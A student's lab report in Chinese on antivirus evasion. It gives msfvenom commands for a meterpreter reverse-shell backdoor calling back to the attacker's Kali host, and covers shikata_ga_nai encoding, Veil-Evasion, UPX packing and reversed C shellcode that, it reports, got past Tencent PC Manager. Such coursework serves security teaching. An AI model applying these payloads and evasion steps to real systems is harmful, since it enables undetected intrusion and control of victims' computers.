20155305《网络对抗》免杀原理与实践
实验主要过程
1、免杀效果参考基准
- Kali使用上次实验msfvenom产生后门的可执行文件,刚刚传送到Win主机就被电脑管家查杀了恢复后这次放入老师提供的网址http://www.virscan.org/进行扫描,有48%的杀软报告病毒。
2、使用msf编码器
- 编码一次
Kali输入命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘x00’ LHOST=kali的IP LPORT=5305端口号 -f exe >自己起后门名字.exe
理论上会降低被查出率,但因为老师说由于使用的这个编码平台太著名了,很容易被杀软盯上,所以实际上并没有什么变化。网站监测结果是51%的杀软报告病毒,还不如不编码呢(高了两个百分点)。
回连成功
- 多次编码
Kali输入命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘x00’ LHOST=kali的IP LPORT=5305端口号 -f exe > 自己起后门名字.exe
多次编码依旧没有任何作用,被电脑管家查杀,恢复后放入网站检查
尝试回连,录音功能成功
3、使用Veil-Evasion重新编写源代码
- 在Kali中安装veil,
sudo apt-get install veil,这其中有paython的安装可能有些电脑没有wine32,所以需要安装apt-get install wine32
- 在Kali的终端中启动Veil-Evasion
命令行中输入veil,后在veil中输入命令use evasion
依次输入如下命令生成你的可执行文件:
use python/meterpreter/rev_tcp.py(设置payload)
set LHOST Kali的IP(设置反弹连接IP)
set LPORT 端口号(设置反弹端口)
generate
可执行文件名
选择使用语言来编写
根据生成路径找到生成的可执行文件,放到网上进行检测,有20%的杀软报告病毒,这个异常难安装的veil加python终于降低了被查杀率,还是有些效果的。
尝试回连,拍照功能成功
4、UPX加壳尝试
命令upx 5305.exe -o 5305-2.exe
upx加壳后的5305-2.exe看着很牛皮,但是被电脑管家妥妥查杀了。。。
再在网站扫描一下,百分之48的惊人数据说明upx加壳没什么用啊
5、C语言调用Shellcode
- 首先,在Kali上使用命令生成一个c语言格式的Shellcode数组。
- VS编译运行产生exe文件(exe文件名不能存在20155305这样的学号因为网站检测时会说有明显广告语。。)
- 只有百分之十二的杀软报告发现病毒,免杀效果非常可观,重点是我的腾讯管家没有弹出警告,有点遗憾,但有觉得免杀学会了之后确实有点厉害哦
- 优化
上面的结果已经不错了,但是还可以更好,比如逆序修改Shellcode数组,然后再用它替换上面的c文件里原本的Shellcode数组。编译运行后结果有了很大提升,电脑管家没有查杀出来,优化前后均可实现杀软共生
6、实测优化版本、回连成功
按照上次实验用过的msf监听方法在Kali上打开监听,在Win主机开启杀软(Win安装腾讯电脑管家 )的情况下,运行最后生成的优化版exe文件,Kali成功获取了Win主机的权限
